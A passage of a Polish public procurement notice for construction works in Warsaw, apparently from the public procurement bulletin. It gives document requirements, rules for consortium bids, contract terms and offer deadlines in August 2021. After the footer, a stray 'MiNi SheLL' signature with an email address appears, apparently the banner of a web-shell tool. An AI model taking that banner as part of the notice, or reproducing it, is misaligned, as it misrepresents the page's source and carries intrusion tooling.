nr 9 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazy robót budowlanych wraz z dowodami należytego ich wykonania– załącznik 10 do SWZ,<br/>b) wykaz osób – załącznik 10a do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Oferta <br/>b)	Oświadczenie o spełnieniu obowiązku RODO <br/>c)	Do oferty należy dołączyć dokumenty wskazujące, że osoba podpisująca ofertę i inne dokumenty lub oświadczenia jest do tej czynności umocowana, chyba że umocowanie wynika z dokumentów dostępnych dla Zamawiającego. <br/>d)	W przypadku, gdyby oferta zawierała informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia lub dokumentu zawierającego informacje, stanowiącą tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. e)	Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, <br/>f)	Formularz cenowy - załącznik nr 5 do SWZ <br/>g)	W przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy którzy powołują się przy spełnianiu warunku dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej oraz dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia przez jednego z Wykonawców dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – załącznik nr 6 do SWZ. <br/>h)	Informacja o części zamówienia jaką Wykonawca zamierza powierzyć podwykonawcom (załącznik nr 7 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>a)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>b)	Oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie powinien być załączony do oferty <br/>i zawierać w szczególności wskazanie:<br/>	postępowania o zamówienie publiczne, którego dotyczy,<br/>	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych <br/>z nazwy z określeniem adresu siedziby,<br/>	ustanowionego Pełnomocnika oraz zakresu jego umocowania. <br/>c)	Dokument pełnomocnictwa musi być sporządzony w formie lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym,podpisem zaufanym lub podpisem osobistym, podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. <br/>d)	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie muszą wykazać, że warunki określone <br/>w pkt 3.1. ppkt.1. SWZ każdy z nich spełnia samodzielnie (odrębnie), warunki określone w pkt 3.1 ppkt. 2 SWZ, spełniają wspólnie (łącznie) lub samodzielnie lub polegając na zasobach innych podmiotów.<br/>e)	Każdy z Wykonawców (każdy członek konsorcjum) składających ofertę wspólną musi wykazać brak podstaw do wykluczenia, w tym celu każdy z członków konsorcjum wypełnia oświadczenie zgodnie z pkt 3.4.1 i 3.5.1 oraz 3.6 lit 4. SWZ.<br/>f)	W odniesieniu do warunków określonych w art. 117 i 188 ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców. <br/>g)	Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą lub Pełnomocnika.<br/>h)	Oferta musi zostać podpisana przez Pełnomocnika lub wszystkich Wykonawców.<br/>i)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem Wykonawcy, <br/>j)	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.<br/>UWAGA: Oferta składana przez spółki cywilne (o których jest mowa w Tytule XXXI Księgi Trzeciej Kodeksu cywilnego (j.t. Dz. U z 2018 r. poz. 1025 ze zm.) oraz art. 4 ust 2 ustawy Prawo przedsiębiorców (j.t. Dz. U <br/>z 2018 r. poz 646 ze zm.) jest traktowana jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego i solidarnie za nie odpowiadają. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z paragrafem 14 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa zamawiającego https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-06 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com